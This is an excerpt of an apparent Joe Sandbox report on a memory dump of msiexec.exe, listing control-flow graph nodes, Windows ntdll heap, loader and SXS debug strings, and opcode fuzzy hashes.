                                            control_flow_graph 861 1fdb8b42-1fdb8bba GetPEB call 1fd10750 864 1fdb8d12-1fdb8d1a 861->864 865 1fdb8bc0-1fdb8bde call 1fd14390 861->865 866 1fdb8d1b-1fdb8d30 call 1fd54c30 864->866 871 1fdb8bff-1fdb8c07 865->871 872 1fdb8be0-1fdb8bf9 call 1fd57bb0 865->872 874 1fdb8c09-1fdb8c1e call 1fd44ff1 871->874 875 1fdb8c37-1fdb8c40 871->875 872->864 872->871 874->864 881 1fdb8c24-1fdb8c2c 874->881 875->864 878 1fdb8c46-1fdb8c48 875->878 878->866 880 1fdb8c4e-1fdb8c5c 878->880 882 1fdb8c68-1fdb8c6e 880->882 881->864 883 1fdb8c32 881->883 884 1fdb8c5e-1fdb8c62 882->884 885 1fdb8c70 882->885 883->866 886 1fdb8c72-1fdb8c74 884->886 887 1fdb8c64-1fdb8c65 884->887 888 1fdb8ccf-1fdb8cf5 call 1fd44f30 885->888 886->888 889 1fdb8c76-1fdb8c7f 886->889 887->882 888->866 894 1fdb8cf7-1fdb8d10 call 1fd57bb0 888->894 889->888 891 1fdb8c81-1fdb8c83 889->891 893 1fdb8c87-1fdb8c9b call 1fd57bb0 891->893 899 1fdb8cb9 893->899 900 1fdb8c9d 893->900 894->864 894->866 902 1fdb8cbd-1fdb8ccd 899->902 901 1fdb8ca0-1fdb8ca9 900->901 901->901 903 1fdb8cab-1fdb8cb5 901->903 902->888 902->893 903->864 904 1fdb8cb7 903->904 904->902
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: b244062097c1f97d6e1e0da16f59af93eea70580de5dbef51d3dfb409d480c6b
                                            • Instruction ID: 4db2147225b882a21a348ea4eb1c0da9720c40abab47e0046bd730b120897e13
                                            • Opcode Fuzzy Hash: b244062097c1f97d6e1e0da16f59af93eea70580de5dbef51d3dfb409d480c6b
                                            • Instruction Fuzzy Hash: 4251D4B15143459FC365DF188845BBBBBE8FF96350F104A1EE89AC7281E730E50AC7A2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 905 1fd2ad00-1fd2ad30 906 1fd78074-1fd78090 call 1fd8ea12 905->906 907 1fd2ad36-1fd2ad4f call 1fd59020 905->907 914 1fd78098-1fd780a3 906->914 912 1fd2ad51-1fd2ad53 907->912 913 1fd2ad59-1fd2ad60 907->913 912->913 912->914 915 1fd2ad64-1fd2ad6d 913->915 916 1fd780a5-1fd780c1 call 1fd8ea12 914->916 917 1fd780c4-1fd780d4 call 1fd90283 914->917 918 1fd2ad73-1fd2ad7a 915->918 919 1fd780d9 915->919 916->917 917->915 922 1fd2ad80-1fd2ad86 918->922 923 1fd2b014 918->923 926 1fd780e3-1fd780e6 919->926 922->926 928 1fd2ad8c-1fd2ad9a call 1fd2c580 922->928 927 1fd2b019-1fd2b021 923->927 926->928 930 1fd780ec-1fd780f1 926->930 931 1fd2b027-1fd2b02e 927->931 932 1fd7839c-1fd783a5 call 1fd3e8c0 927->932 937 1fd780f6 928->937 938 1fd2ada0-1fd2adf1 call 1fd2b1b0 928->938 930->927 934 1fd2b034-1fd2b04a call 1fd54c30 931->934 935 1fd783aa-1fd783c6 call 1fd8ea12 931->935 932->935 946 1fd78100-1fd78108 937->946 949 1fd2af66-1fd2af76 938->949 950 1fd2adf7-1fd2adfd 938->950 947 1fd2ae34-1fd2ae44 946->947 948 1fd7810e-1fd78116 946->948 956 1fd2ae46-1fd2ae48 947->956 957 1fd2ae18-1fd2ae26 947->957 948->947 951 1fd7811c-1fd7814f 948->951 952 1fd78376-1fd7837c call 1fd0bae0 949->952 953 1fd2af7c-1fd2afa3 949->953 954 1fd2b092-1fd2b09a 950->954 955 1fd2ae03-1fd2ae16 950->955 951->947 977 1fd78381-1fd7838a call 1fd47ed6 952->977 959 1fd2afb3-1fd2afb5 953->959 960 1fd2afa5-1fd2afae call 1fd2c580 953->960 961 1fd2b0c3-1fd2b0f7 954->961 962 1fd2b09c-1fd2b0b9 call 1fd2f460 954->962 955->956 955->957 964 1fd78154 956->964 965 1fd2ae4e-1fd2ae75 call 1fd22410 956->965 957->947 963 1fd2ae28-1fd2ae2b 957->963 959->927 970 1fd2afb7-1fd2afba 959->970 960->959 971 1fd782a7-1fd782ca call 1fd32560 961->971 972 1fd2b0fd-1fd2b118 call 1fd3203e 961->972 984 1fd2af46-1fd2af4d 962->984 985 1fd2b0bf 962->985 963->946 969 1fd2ae31 963->969 974 1fd7815e-1fd78162 964->974 990 1fd2b05b 965->990 991 1fd2ae7b-1fd2ae7d 965->991 969->947 976 1fd2afc0-1fd2afc3 970->976 970->977 996 1fd782cf-1fd782eb call 1fd8ea12 971->996 992 1fd2b156-1fd2b16f call 1fd3e4a9 972->992 993 1fd2b11a-1fd2b13d call 1fd2f460 972->993 981 1fd2b04d-1fd2b055 974->981 982 1fd78168 974->982 986 1fd7838c-1fd78390 call 1fd2f6e2 976->986 987 1fd2afc9-1fd2afcb 976->987 1010 1fd78395 977->1010 981->990 994 1fd2ae80-1fd2ae8d 981->994 1009 1fd7816d-1fd78174 982->1009 995 1fd2af53-1fd2af55 984->995 984->996 985->961 986->1010 999 1fd2afda-1fd2afe3 call 1fd2d4c1 987->999 1000 1fd2afcd-1fd2afcf 987->1000 1007 1fd2b065-1fd2b06b 990->1007 991->994 1027 1fd2b171-1fd2b18c 992->1027 1028 1fd2b199-1fd2b19f call 1fd0bae0 992->1028 993->992 1022 1fd2b13f-1fd2b154 call 1fd45831 993->1022 994->981 1003 1fd2ae93-1fd2ae98 994->1003 1005 1fd2af62 995->1005 1006 1fd2af57-1fd2af5c 995->1006 1016 1fd782f3-1fd78305 996->1016 999->927 1000->999 1011 1fd2afd1-1fd2afd8 1000->1011 1003->974 1014 1fd2ae9e-1fd2aea5 1003->1014 1005->949 1006->1005 1006->1016 1017 1fd2b071-1fd2b078 1007->1017 1018 1fd2af0e-1fd2af2f call 1fd225b0 call 1fd23d20 1007->1018 1020 1fd2aff9-1fd2affd 1009->1020 1021 1fd7817a-1fd78182 1009->1021 1010->932 1011->999 1014->981 1023 1fd2aeab-1fd2aeb9 1014->1023 1016->1005 1024 1fd7830b-1fd7834a call 1fd2d4c1 call 1fd31abf call 1fd49ef3 call 1fd47ad9 1016->1024 1017->1018 1056 1fd78230-1fd78239 GetPEB 1018->1056 1057 1fd2af35-1fd2af3d 1018->1057 1025 1fd2afff 1020->1025 1026 1fd2b07d-1fd2b081 1020->1026 1021->1020 1029 1fd78188-1fd781bf 1021->1029 1022->992 1032 1fd78227-1fd7822b 1023->1032 1033 1fd2aebf-1fd2aecf 1023->1033 1024->1005 1072 1fd78350-1fd78355 1024->1072 1037 1fd2b002-1fd2b005 1025->1037 1035 1fd781c7-1fd781ce 1026->1035 1036 1fd2b087-1fd2b08d 1026->1036 1027->1028 1028->1027 1029->1035 1032->981 1041 1fd2af01-1fd2af08 1033->1041 1042 1fd2aed1-1fd2aeda 1033->1042 1035->1025 1046 1fd781d4-1fd781dc 1035->1046 1036->1037 1044 1fd78223 1037->1044 1045 1fd2b00b 1037->1045 1041->1007 1041->1018 1049 1fd2aee0-1fd2aeee 1042->1049 1044->1032 1045->923 1046->1025 1051 1fd781e2-1fd7821e 1046->1051 1053 1fd2aef4-1fd2aefb 1049->1053 1054 1fd2afe5-1fd2afe8 1049->1054 1051->1037 1053->1049 1061 1fd2aefd 1053->1061 1054->1020 1060 1fd2afea-1fd2afed 1054->1060 1059 1fd78243-1fd78250 GetPEB 1056->1059 1058 1fd2af43 1057->1058 1057->1059 1058->984 1059->1058 1063 1fd78256-1fd7825d call 1fd23d20 1059->1063 1060->1009 1064 1fd2aff3-1fd2aff6 1060->1064 1061->1041 1070 1fd7826f 1063->1070 1071 1fd7825f-1fd7826d GetPEB 1063->1071 1064->1020 1073 1fd78274-1fd78277 1070->1073 1071->1073 1072->1005 1074 1fd7835b-1fd78371 call 1fd2d4c1 1072->1074 1073->1058 1076 1fd7827d-1fd782a2 call 1fd905a7 1073->1076 1074->1005 1076->1058
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-3197712848
                                            • Opcode ID: 92898d269fd7e07bca7c6a5c5643fc695df9b6c2e7df5273a69dccb20dde97b3
                                            • Instruction ID: 8f21611b3b241248ef89701f2608ef99278a281a51bee208359d82edac7fd16a
                                            • Opcode Fuzzy Hash: 92898d269fd7e07bca7c6a5c5643fc695df9b6c2e7df5273a69dccb20dde97b3
                                            • Instruction Fuzzy Hash: C012D575A083918BD3A1DF24C440BBAB7E0FF85718F844619F9C58B290EB75E945CBA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1080 1fdc0cb5-1fdc0cdb call 1fdc11a4 1083 1fdc0ff4-1fdc0ffe GetPEB 1080->1083 1084 1fdc0ce1-1fdc0ce3 1080->1084 1087 1fdc100e-1fdc1012 1083->1087 1088 1fdc1000-1fdc1007 1083->1088 1085 1fdc0ce5-1fdc0cec 1084->1085 1086 1fdc0cf2-1fdc0d00 1084->1086 1085->1086 1089 1fdc10f4-1fdc10f6 1085->1089 1090 1fdc0d6c-1fdc0d6e 1086->1090 1091 1fdc1029 1087->1091 1092 1fdc1014-1fdc1024 call 1fd0fb1a 1087->1092 1088->1087 1095 1fdc102b-1fdc102f 1089->1095 1093 1fdc0d70-1fdc0d88 1090->1093 1094 1fdc0d02-1fdc0d09 1090->1094 1091->1095 1092->1091 1097 1fdc0dba-1fdc0dc9 1093->1097 1098 1fdc0d8a-1fdc0d91 1093->1098 1099 1fdc0d2d-1fdc0d3e 1094->1099 1100 1fdc0d0b-1fdc0d1b 1094->1100 1102 1fdc0dcf-1fdc0dd6 1097->1102 1103 1fdc0f5b-1fdc0f6f 1097->1103 1098->1097 1101 1fdc0d93-1fdc0dad call 1fd52bf0 1098->1101 1105 1fdc0e99-1fdc0ea3 GetPEB 1099->1105 1106 1fdc0d44-1fdc0d4b 1099->1106 1100->1099 1104 1fdc0d1d-1fdc0d27 call 1fdcdac6 1100->1104 1101->1097 1138 1fdc0daf-1fdc0db7 1101->1138 1110 1fdc0dd8-1fdc0de8 1102->1110 1111 1fdc0df9-1fdc0dfe 1102->1111 1108 1fdc0f9e-1fdc0fa6 1103->1108 1109 1fdc0f71-1fdc0f90 call 1fdc12ed 1103->1109 1104->1099 1115 1fdc0ea5-1fdc0ec0 GetPEB call 1fd0b970 1105->1115 1116 1fdc0ec2-1fdc0ec7 call 1fd0b970 1105->1116 1113 1fdc0e38-1fdc0e42 GetPEB 1106->1113 1114 1fdc0d51-1fdc0d58 1106->1114 1122 1fdc0fac-1fdc0fb6 GetPEB 1108->1122 1123 1fdc1030-1fdc1033 1108->1123 1150 1fdc0ff1 1109->1150 1151 1fdc0f92-1fdc0f96 1109->1151 1110->1111 1124 1fdc0dea-1fdc0df4 call 1fdcdac6 1110->1124 1126 1fdc0efb-1fdc0eff 1111->1126 1127 1fdc0e04-1fdc0e0b 1111->1127 1118 1fdc0e44-1fdc0e5f GetPEB call 1fd0b970 1113->1118 1119 1fdc0e61-1fdc0e66 call 1fd0b970 1113->1119 1128 1fdc0d69 1114->1128 1129 1fdc0d5a-1fdc0d67 1114->1129 1137 1fdc0ecc-1fdc0ede call 1fd0b970 1115->1137 1116->1137 1152 1fdc0e6b-1fdc0e78 call 1fd0b970 1118->1152 1119->1152 1134 1fdc0fb8-1fdc0fd3 GetPEB call 1fd0b970 1122->1134 1135 1fdc0fd5-1fdc0fda call 1fd0b970 1122->1135 1142 1fdc1079-1fdc107d 1123->1142 1143 1fdc1035-1fdc103f GetPEB 1123->1143 1124->1111 1139 1fdc0f0e-1fdc0f12 1126->1139 1140 1fdc0f01-1fdc0f0c call 1fdbdaac 1126->1140 1127->1126 1144 1fdc0e11 1127->1144 1128->1090 1129->1128 1171 1fdc0fdf-1fdc0fe4 1134->1171 1135->1171 1183 1fdc0e79-1fdc0e7e 1137->1183 1138->1097 1158 1fdc0f24-1fdc0f2e 1139->1158 1159 1fdc0f14-1fdc0f22 1139->1159 1140->1139 1185 1fdc0f3a-1fdc0f3e 1140->1185 1148 1fdc107f-1fdc1087 1142->1148 1149 1fdc10f1-1fdc10f3 1142->1149 1160 1fdc105e-1fdc1063 call 1fd0b970 1143->1160 1161 1fdc1041-1fdc105c GetPEB call 1fd0b970 1143->1161 1145 1fdc0e17-1fdc0e1f 1144->1145 1146 1fdc0ee0-1fdc0ee5 1144->1146 1145->1126 1164 1fdc0e25-1fdc0e33 1145->1164 1146->1126 1174 1fdc0ee7-1fdc0eee 1146->1174 1166 1fdc10a8-1fdc10b0 1148->1166 1167 1fdc1089-1fdc1090 1148->1167 1149->1089 1172 1fdc0ff3 1150->1172 1151->1109 1168 1fdc0f98-1fdc0f9b 1151->1168 1152->1183 1158->1103 1162 1fdc0f30-1fdc0f35 1158->1162 1159->1158 1177 1fdc1068-1fdc1074 1160->1177 1161->1177 1162->1102 1164->1126 1180 1fdc10dc-1fdc10ec call 1fd0fb1a 1166->1180 1181 1fdc10b2-1fdc10c1 1166->1181 1178 1fdc1091-1fdc10a0 1167->1178 1168->1108 1182 1fdc0fe9-1fdc0fee call 1fd0b970 1171->1182 1172->1083 1174->1126 1184 1fdc0ef0-1fdc0ef8 1174->1184 1177->1182 1187 1fdc10fb-1fdc1105 GetPEB 1178->1187 1188 1fdc10a2-1fdc10a6 1178->1188 1180->1149 1181->1180 1189 1fdc10c3-1fdc10d4 1181->1189 1182->1150 1183->1172 1190 1fdc0e84-1fdc0e94 1183->1190 1184->1126 1185->1091 1186 1fdc0f44-1fdc0f56 1185->1186 1186->1091 1195 1fdc1124-1fdc1129 call 1fd0b970 1187->1195 1196 1fdc1107-1fdc1122 GetPEB call 1fd0b970 1187->1196 1188->1166 1188->1178 1193 1fdc114f-1fdc1159 GetPEB 1189->1193 1194 1fdc10d6-1fdc10da 1189->1194 1190->1172 1200 1fdc1178-1fdc117d call 1fd0b970 1193->1200 1201 1fdc115b-1fdc1176 GetPEB call 1fd0b970 1193->1201 1194->1180 1194->1189 1204 1fdc112e-1fdc1147 call 1fd0b970 1195->1204 1196->1204 1206 1fdc1182-1fdc119c call 1fd0b970 1200->1206 1201->1206 1204->1193
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy$n links were not started yet.
                                            • API String ID: 0-2958794849
                                            • Opcode ID: 8d22f30c73b00140f5003e681911cafde3c9a1bbff8d6ca58a5d91c5af0f5d1b
                                            • Instruction ID: e0db32c3e4546b8ee5287861e811528c14aa1c36d7d7bdc2b5e37eb7fa1969d1
                                            • Opcode Fuzzy Hash: 8d22f30c73b00140f5003e681911cafde3c9a1bbff8d6ca58a5d91c5af0f5d1b
                                            • Instruction Fuzzy Hash: 35F1BB35A04696EFCB51CF64C484BBABBF5EF0A300F04815DE485DB682E734B985DB60
                                            Strings
                                            • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 1FD82881
                                            • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 1FD82856
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1FD828B2
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1FD8292E
                                            • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 1FD829AC
                                            • @, xrefs: 1FD43180
                                            • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 1FD829B1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                            • API String ID: 0-541586583
                                            • Opcode ID: 0b982815cf8c9eb78ea283120e17598e255050f82baeb0bfb0e9aa815dd871e3
                                            • Instruction ID: 4078d2cf04601784f03ccd1b5d319424596639e250ea73202f1a45dc465edef4
                                            • Opcode Fuzzy Hash: 0b982815cf8c9eb78ea283120e17598e255050f82baeb0bfb0e9aa815dd871e3
                                            • Instruction Fuzzy Hash: 6CC1D675D40329DBDB609F59CC84BBAB7B4EF44711F1041E9E848AB290EB34AE81DF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: bde90dbe37dcb41d4d7fbda563ef065d7ce33a7b95f51970c61d5f533c12af0a
                                            • Instruction ID: dc43a6e34a95dde8a3178b797efd381b374a1fdb50d8cf886f7119ee68572f71
                                            • Opcode Fuzzy Hash: bde90dbe37dcb41d4d7fbda563ef065d7ce33a7b95f51970c61d5f533c12af0a
                                            • Instruction Fuzzy Hash: B1A25B75A0966ACFDBA5CF25DC887ADB7B5AF45304F1042D9D44DAB290EB70AE81CF00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                            • API String ID: 0-4098886588
                                            • Opcode ID: 14ca6bd87e7dd086f649b1c33e92f8f033be751419484b16805934d1a131a7d5
                                            • Instruction ID: d6d18d37648b30dbb189e69cf16f9de999810a64eb543097f1d3748b7fda81fc
                                            • Opcode Fuzzy Hash: 14ca6bd87e7dd086f649b1c33e92f8f033be751419484b16805934d1a131a7d5
                                            • Instruction Fuzzy Hash: B93281759083A98BDBA1CF24D894BFEB7B5AF45344F1442E6E448AF250DB31AEC18F50
                                            Strings
                                            • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 1FD8279C
                                            • \WinSxS\, xrefs: 1FD42E23
                                            • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 1FD82706
                                            • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 1FD8276F
                                            • .Local\, xrefs: 1FD42D91
                                            • @, xrefs: 1FD42E4D
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                            • API String ID: 0-3926108909
                                            • Opcode ID: 98812a61da877b07329ea30c213e22d3279bff19c4bc0e09f6cb99001d193f60
                                            • Instruction ID: de17c341f501c72d811141c21ee8e8dfc8cee7e0f2169695ba1e48ab74ea1f89
                                            • Opcode Fuzzy Hash: 98812a61da877b07329ea30c213e22d3279bff19c4bc0e09f6cb99001d193f60
                                            • Instruction Fuzzy Hash: DB81DE755043419FCB91CF25C890AABBBE4BF85711F50896EF894CB291E370E944CBA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                            • API String ID: 0-3127649145
                                            • Opcode ID: 767114b8484107baea418de912f6f873ee3df69816baec393eb65988b655294d
                                            • Instruction ID: 026a2647bf5122e54f1bc7506145315b1a7ee285aac2706c788399ef004c05d3
                                            • Opcode Fuzzy Hash: 767114b8484107baea418de912f6f873ee3df69816baec393eb65988b655294d
                                            • Instruction Fuzzy Hash: 93323D759017199BDFA1CF65CC88BAAB7F8FF44304F1041AAD50DA7290EB71AA84CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                            • API String ID: 0-2518169356
                                            • Opcode ID: 8aa720367cacf59c24c8331f2b821a2f51a50d2dd866473034bfc0d9c0e6ec14
                                            • Instruction ID: 8bd75aef7a1e78fae9f4c9bd2ccc6ac1ff54c8e8b3a9fbd7e0c4a9abca1ee7aa
                                            • Opcode Fuzzy Hash: 8aa720367cacf59c24c8331f2b821a2f51a50d2dd866473034bfc0d9c0e6ec14
                                            • Instruction Fuzzy Hash: 9591917690061A8BCB51CFA8C881ABEB7F1FF89310F954269E855EB350E735E941CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                            • API String ID: 0-3492000579
                                            • Opcode ID: 8c543c30c7f52181d4993fbad375c2b1789ae2c5a1e21726d21cfac2f38ecc53
                                            • Instruction ID: c4ab78cc4b0811ab504a6f2839a7e4e4afeb39fd8ee8b42ceb42b532117fb5d9
                                            • Opcode Fuzzy Hash: 8c543c30c7f52181d4993fbad375c2b1789ae2c5a1e21726d21cfac2f38ecc53
                                            • Instruction Fuzzy Hash: 0F71AD35A15385DFCB41DFA8D4406FDBBF2EF8A310F08819DE4869B292D736A945CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 0-3224558752
                                            • Opcode ID: c71bdf70f41e1e2d8987a1711800a663653bd7fef3f57f70ea6b78edf7fad154
                                            • Instruction ID: 918f4ce9fe9f4242be00198fae3eab650749ca7acdc74bb900881eee97242e40
                                            • Opcode Fuzzy Hash: c71bdf70f41e1e2d8987a1711800a663653bd7fef3f57f70ea6b78edf7fad154
                                            • Instruction Fuzzy Hash: 1B414975A00785DFC752DF24C894BBAB7F4EF41324F1482A9D9558B291CB38B881CBE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
